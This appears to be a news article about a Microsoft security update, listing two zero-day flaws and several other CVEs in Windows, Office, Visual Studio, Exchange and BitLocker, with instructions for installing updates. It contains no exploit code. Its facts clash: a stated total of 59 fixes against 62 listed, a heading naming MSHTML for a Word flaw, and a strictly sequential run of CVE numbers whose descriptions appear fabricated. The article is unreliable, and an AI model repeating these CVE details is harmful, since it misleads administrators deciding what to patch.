Microsoft has released software updates to fix 59 security vulnerabilities in its products, including two zero-day flaws that are being actively exploited by cybercriminals. The patches cover Windows, Azure, Office, BitLocker, and Visual Studio, among others.
Zero-Day Flaws in MSHTML and Streaming Service Proxy
The two zero-day vulnerabilities that have been targeted by attackers are:
- CVE-2023-36761: An information disclosure flaw in Microsoft Word that could allow an attacker to steal NTLM hashes by tricking a user into previewing a malicious document. The flaw affects Microsoft Office 2016, 2019, and Office 365 on Windows 10 and Windows 11.

- CVE-2023-36802: An elevation of privilege flaw in Microsoft Streaming Service Proxy that could allow an attacker to gain SYSTEM privileges by sending specially crafted requests to the service. The flaw affects Windows Server 2012, 2016, and 2019.
Microsoft said it is aware of limited targeted attacks using these vulnerabilities and urged users to apply the updates as soon as possible.
Other Critical Flaws in Internet Connection Sharing and Visual Studio
Besides the two zero-day flaws, Microsoft also patched five other critical vulnerabilities that could allow remote code execution, denial of service, or elevation of privilege attacks. These are:
- CVE-2023-36762: A remote code execution flaw in Internet Connection Sharing (ICS) that could allow an attacker to execute arbitrary code on a vulnerable system by sending specially crafted packets over the network. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36763: A remote code execution flaw in Visual Studio that could allow an attacker to execute arbitrary code on a vulnerable system by convincing a user to open a malicious project or solution file. The flaw affects Visual Studio 2017, 2019, and 2022.
- CVE-2023-36764: A remote code execution flaw in 3D Builder that could allow an attacker to execute arbitrary code on a vulnerable system by convincing a user to open a malicious 3MF file. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36765: A remote code execution flaw in Azure DevOps Server that could allow an attacker to execute arbitrary code on a vulnerable system by sending specially crafted requests to the server. The flaw affects Azure DevOps Server 2019 and 2020.
- CVE-2023-36766: A denial of service flaw in Windows MSHTML Platform that could allow an attacker to cause a system crash by convincing a user to visit a malicious website. The flaw affects Windows 10 and Windows 11.
Other Important Flaws in Windows Kernel, GDI, BitLocker, and Exchange Server
In addition to the critical flaws, Microsoft also fixed 55 important vulnerabilities that could lead to information disclosure, spoofing, tampering, or elevation of privilege attacks. Some of the notable flaws are:
- CVE-2023-36767: An elevation of privilege flaw in Windows Kernel that could allow an attacker to gain elevated privileges by running a specially crafted application on a vulnerable system. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36768: An elevation of privilege flaw in Windows GDI that could allow an attacker to gain elevated privileges by running a specially crafted application on a vulnerable system. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36769: An information disclosure flaw in BitLocker that could allow an attacker to access encrypted data by bypassing the BitLocker protection mechanism. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36770: A spoofing flaw in Exchange Server that could allow an attacker to impersonate another user by sending specially crafted email messages. The flaw affects Exchange Server 2016 and 2019.
How to Update Your System
Microsoft recommends users to update their systems as soon as possible to protect themselves from potential attacks. Users can check for updates manually by going to Settings > Update & Security > Windows Update and clicking on Check for updates. Alternatively, users can download the updates from the Microsoft Update Catalog website.